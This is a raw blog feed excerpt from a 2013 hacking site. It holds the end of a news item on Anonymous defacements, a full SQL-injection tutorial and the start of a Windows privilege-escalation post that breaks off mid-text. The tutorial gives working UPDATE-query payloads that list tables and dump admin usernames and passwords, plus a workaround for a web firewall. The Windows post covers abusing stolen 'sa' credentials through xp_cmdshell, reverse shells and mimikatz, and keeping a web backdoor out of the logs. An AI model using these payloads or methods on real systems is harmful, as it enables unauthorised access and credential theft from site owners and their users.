The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs, &amp;nbsp;universities and other educational institutions from Thailand &amp;nbsp;Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.&lt;br /&gt;
&lt;br /&gt;
Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.&lt;br /&gt;
&lt;br /&gt;
We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die "&lt;/b&gt; Mauritania Attacker said.&lt;br /&gt;
&lt;br /&gt;
Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;
&lt;b&gt;&lt;i&gt;Note: RHA has no association with any of the hacktivists.&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Major Part of this article was contributed by a security researcher Deepanker Arora. Recently, He contributed an article on "&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html" target="_blank"&gt;Hacking Windows Servers&lt;/a&gt;&lt;/b&gt;".&lt;br /&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/FmTcplxS9F0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6087721875125654319/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/anonymous-hackers-cause-significant.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6087721875125654319?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6087721875125654319?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/FmTcplxS9F0/anonymous-hackers-cause-significant.html" title="Anonymous Hackers Cause Significant Damage To Banking And Government Agencies" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s72-c/967d3a1e5869cae4490e28b80ae2d53c.jpeg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/anonymous-hackers-cause-significant.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIMQHs7eCp7ImA9WhBUFko.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8888596448950128805</id><published>2013-05-04T06:15:00.002-07:00</published><updated>2013-05-04T06:19:41.500-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-04T06:19:41.500-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection" /><title>SQL Injection With Update Query</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;!-- This HTML code has been optimized by http://www.iwebtool.com/html_optimizer --&gt; &lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;img alt="SQL1.bmp" height="363" src="http://blog.mile2.com/wp-content/uploads/2012/03/SQL1.bmp" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px;" width="400" /&gt;&lt;br /&gt;
We have wrote couple of&amp;nbsp;articles&amp;nbsp;discussing various techniques and attack vectors for SQL Injection, We have already discussed &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank"&gt;Basic SQL Injection With Union Based&lt;/a&gt;&lt;/b&gt;, &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank"&gt;Blind SQL Injection&lt;/a&gt;&lt;/b&gt;, &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html" target="_blank"&gt;Time Based SQL Injection&lt;/a&gt; &lt;/b&gt;and also discussed&lt;b&gt; &lt;a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank"&gt;common problems and their solutions related to SQL Injection&lt;/a&gt;&lt;/b&gt;. However, this time &lt;b&gt;Daniel Max&lt;/b&gt; a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Most of the tutorials, You see on the web usually explains to use the &lt;b&gt;SELECT &lt;/b&gt;method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, &lt;b&gt;For example &lt;/b&gt;a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/En-us/firefox/addon/tamper-data/" rel="nofollow" target="_blank"&gt;Tamper Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://portswigger.net/burp/" rel="nofollow" target="_blank"&gt;Burp Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Know how of MySQL &lt;b&gt;(w3schools.com recommended)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" src="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable parameter is &lt;b&gt;"E-mail format: " &lt;/b&gt;value.We would use&lt;b&gt; Tamper data &lt;/b&gt;to intercept and change the values.&lt;br /&gt;
&lt;br /&gt;
Here is a screenshot:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/glxns7kbo43dvgkxfx7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="496" src="http://i.imm.io/145na.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
After we click ok we get an error the following error:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/uxjirugnl9o93hczvw7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="382" src="http://i.imm.io/145rM.jpeg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
First we want to find the exact database version, but what would be the easiest way.&lt;br /&gt;
&lt;br /&gt;
We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use &lt;b&gt;"fname" &lt;/b&gt;, which is string value. Database query output will be shown inside &lt;b&gt;"First name" &lt;/b&gt;input box (where it says&lt;b&gt; MaXoNe&lt;/b&gt;).&lt;br /&gt;
&lt;br /&gt;
Screenshot of version query:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/rq10im4pbxlq9z28njt.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="498" src="http://i.imm.io/145sB.jpeg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="577" src="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" width="518" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now that we know how to create our query, lets get the tables.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query: &lt;u&gt;html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone =&lt;/u&gt;&lt;/b&gt;&lt;u&gt; '&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Tables Query:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="496" src="http://i.imm.io/145tb.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="577" src="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" width="488" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Three tables, strange !? Lets check that again.We use count.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query&lt;/b&gt;:&lt;b&gt;&lt;u&gt; html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of &lt;b&gt;get tables count query&lt;/b&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="495" src="http://i.imm.io/145tA.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="640" src="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" width="506" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Now is time for Burp intruder.Set browser to use &lt;b&gt;127.0.0.1&lt;/b&gt; and &lt;b&gt;8080&lt;/b&gt; for all URLs.&lt;br /&gt;
We use Burp Suite intruder with '&lt;b&gt;Attack type&lt;/b&gt;' "&lt;b&gt;Sniper&lt;/b&gt;" and '&lt;b&gt;Payload type&lt;/b&gt;' "&lt;b&gt;Numbers&lt;/b&gt;"&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Full query:&lt;/b&gt; &lt;b&gt;html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of burp settings:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="386" src="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="396" src="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="427" src="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="382" src="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Thats it. And now you just get columns the same way with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
Full query: &lt;b&gt;&lt;u&gt;html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Just increment &lt;b&gt;n&lt;/b&gt; with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
Values :&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query: &lt;u&gt;html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Just increment&lt;b&gt; n&lt;/b&gt; with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
That's it , simple and yet effective . I used this because , waf blocke&lt;b&gt;d -- &lt;/b&gt;and -&lt;b&gt;-+&lt;/b&gt; so I wasn't able to close and comment out query.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/sm69TYuUVlk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8888596448950128805/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/sql-injection-with-update-query.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8888596448950128805?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8888596448950128805?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/sm69TYuUVlk/sql-injection-with-update-query.html" title="SQL Injection With Update Query" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/sql-injection-with-update-query.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ECQ3c7eCp7ImA9WhBVGUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4456024198548604877</id><published>2013-04-26T08:54:00.001-07:00</published><updated>2013-04-26T08:54:22.900-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-26T08:54:22.900-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Windows" /><title>Hacking Windows Servers - Privilege Escalation </title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s1600/hacking+windows+using+linux.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="257" src="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s320/hacking+windows+using+linux.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of us here can hack websites and servers. But what we
hate the most is an error message- Access Denied! We know some methods to
bypass certain restrictions using the symlink, privilege-escalation using local
root exploits and some similar attacks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
But, these get the job done only on Linux servers.&lt;b&gt; What
about windows servers&lt;/b&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Here are some ways to bypass certain restrictions on windows
servers or getting SYSTEM privileges.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using "sa" account to execute commands
by MSSQL query via 'xp_cmdshell' stored procedure.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using meterpreter payload to get a reverse shell
over the target machine.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using browser_autopwn. (Really...)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using other tools like pwdump7, mimikatz, etc.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
Using the tools is an easy way, but the real fun of hacking lies
in the first three methods I mentioned above.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;1. Using xp_cmdshell-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of the times on windows servers, we have read
permission over the files of other IIS users, which is needed to make this
method work.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
If we are lucky enough, we will find login credentials of
"sa" account of MSSQL server inside web.config file of any website.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
You must be wondering why only "sa"?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Here, "sa" stands for Super Administrator and as
the name tells, this user has all possible permissions over the server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
The picture below shows the connection string containing
login credentials of "sa" account.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-Bw2HOfccpKI/UXqcOmOxlUI/AAAAAAAAAWs/vwJhbW0-BEg/s1600/mssql+conn.+string.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="40" src="http://3.bp.blogspot.com/-Bw2HOfccpKI/UXqcOmOxlUI/AAAAAAAAAWs/vwJhbW0-BEg/s400/mssql+conn.+string.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Using this, we can log into MSSQL server locally (using our web backdoor) &amp;amp; as well as remotely. I would recommend remote access because
it does not generate webserver logs which would fill the log file with our web
backdoor path.&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
So, after getting the "sa" account, we can login
remotely using HeidiSQL&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
HeidiSQL is an awesome tool to connect to remote database
servers. You can download it &lt;a href="http://www.heidisql.com/download.php"&gt;here&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
After logging into MSSQL server with sa account, we get a
list of databases and their contents.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2sK-173nhw4/UXqcNh5J-AI/AAAAAAAAAWc/_CQzLGOmOis/s1600/heidi+sa+login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="http://2.bp.blogspot.com/-2sK-173nhw4/UXqcNh5J-AI/AAAAAAAAAWc/_CQzLGOmOis/s400/heidi+sa+login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape id="Picture_x0020_2"
 o:spid="_x0000_i1030" type="#_x0000_t75" style='width:468pt;height:245.25pt;
 visibility:visible;mso-wrap-style:square'&gt;
 &lt;v:imagedata src="file:///C:\Users\r00t3r\AppData\Local\Temp\msohtmlclip1\01\clip_image003.png"
  o:title=""/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we can execute commands using MSSQL queries via
xp_cmdshell. (With administrator privileges)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Syntax for the query is-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;xp_cmdshell '[command]'&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
For example, if I need to know my current privileges, I
would query-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;xp_cmdshell 'whoami'&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
